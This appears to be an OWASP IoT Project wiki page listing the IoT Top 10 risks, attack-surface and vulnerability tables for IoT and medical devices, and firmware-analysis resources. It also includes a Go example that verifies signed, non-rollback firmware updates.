* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's Slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known vulnerabilities that come with them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Physical tampering<br />
* Physical damage<br />
|}<br />
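The Update Mechanism and Device Firmware rows above (updates not signed, update verification, lack of payload verification, firmware downgrade possibility) name what a device-side update check has to refuse; the same rows recur in the Medical Device table below. The Go program that follows is an added example, not OWASP project code: it assumes a vendor Ed25519 key pair whose public half is provisioned in the device, and a manifest format (product, version, SHA-256 of the image) constructed for the example.<br />

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Manifest is the signed metadata shipped with a firmware image (format
// constructed for this example). The device authenticates it, then uses it
// to check version and image digest before writing anything to flash.
type Manifest struct {
	Product   string   // product the image was built for
	Version   uint32   // monotonically increasing firmware version
	ImageHash [32]byte // SHA-256 of the complete image
}

// encode serialises the manifest deterministically so the signature covers
// every field and none can be swapped without invalidating it.
func (m Manifest) encode() []byte {
	var buf bytes.Buffer
	buf.WriteString(m.Product)
	buf.WriteByte(0) // terminator makes the product name length unambiguous
	binary.Write(&buf, binary.BigEndian, m.Version)
	buf.Write(m.ImageHash[:])
	return buf.Bytes()
}

// Update is what the device receives over a possibly hostile network.
type Update struct {
	Manifest  Manifest
	Signature []byte
	Image     []byte
}

// DeviceState is the trust anchor provisioned in the device plus what it runs.
type DeviceState struct {
	Product          string
	VendorPublicKey  ed25519.PublicKey
	InstalledVersion uint32
}

var (
	ErrBadSignature = errors.New("manifest not signed by the vendor key")
	ErrWrongProduct = errors.New("manifest is for a different product")
	ErrRollback     = errors.New("version not newer than installed (downgrade refused)")
	ErrHashMismatch = errors.New("image digest does not match the signed manifest")
)

// VerifyUpdate performs the device-side checks in dependency order: signature
// (updates not signed), product binding, anti-rollback (firmware downgrade)
// and image integrity (lack of payload verification).
func VerifyUpdate(dev DeviceState, u Update) error {
	// 1. Authenticate the manifest before trusting any field inside it.
	if !ed25519.Verify(dev.VendorPublicKey, u.Manifest.encode(), u.Signature) {
		return ErrBadSignature
	}
	// 2. A genuine manifest for another product must still be refused.
	if u.Manifest.Product != dev.Product {
		return ErrWrongProduct
	}
	// 3. Refuse downgrades: a validly signed old build may carry known bugs.
	if u.Manifest.Version <= dev.InstalledVersion {
		return ErrRollback
	}
	// 4. Bind the signed manifest to the bytes about to be written to flash.
	if sha256.Sum256(u.Image) != u.Manifest.ImageHash {
		return ErrHashMismatch
	}
	return nil
}

// NewVendorKey generates the vendor signing key pair; only the public half is
// provisioned into devices, the private half stays on the build server.
func NewVendorKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, _ := ed25519.GenerateKey(nil) // nil selects crypto/rand; error not handled in this example
	return pub, priv
}

// SignUpdate is the vendor-side (build server) counterpart of VerifyUpdate.
func SignUpdate(priv ed25519.PrivateKey, product string, version uint32, image []byte) Update {
	m := Manifest{Product: product, Version: version, ImageHash: sha256.Sum256(image)}
	return Update{Manifest: m, Signature: ed25519.Sign(priv, m.encode()), Image: image}
}

func main() {
	pub, priv := NewVendorKey()
	dev := DeviceState{Product: "sensor-hub", VendorPublicKey: pub, InstalledVersion: 7}
	good := SignUpdate(priv, "sensor-hub", 8, []byte("constructed image v8"))
	fmt.Println("genuine v8:", VerifyUpdate(dev, good))
	// Downgrade attempt: correctly signed, but older than what is installed.
	old := SignUpdate(priv, "sensor-hub", 6, []byte("constructed image v6"))
	fmt.Println("signed v6 :", VerifyUpdate(dev, old))
}
```

Transport encryption (TLS) for the download is still needed for confidentiality, but it does not replace these checks: a writable update location or a compromised mirror defeats TLS alone, while a signed manifest with version and digest does not depend on where the file came from.<br />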
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to weak values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies access to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb, the execution of the firmware on the device can be modified and almost all software-based security controls bypassed.<br />
* Side-channel attacks can also modify the execution flow or be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, one can obtain full console access to a device<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping medical device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Physical tampering<br />
* Physical damage<br />
* Failure state analysis<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way for people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! Details<br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy-to-guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard-code passwords or hashes<br />
* Have source code reviewed by a third party before releasing the device to production<br />
* Ensure industry-standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
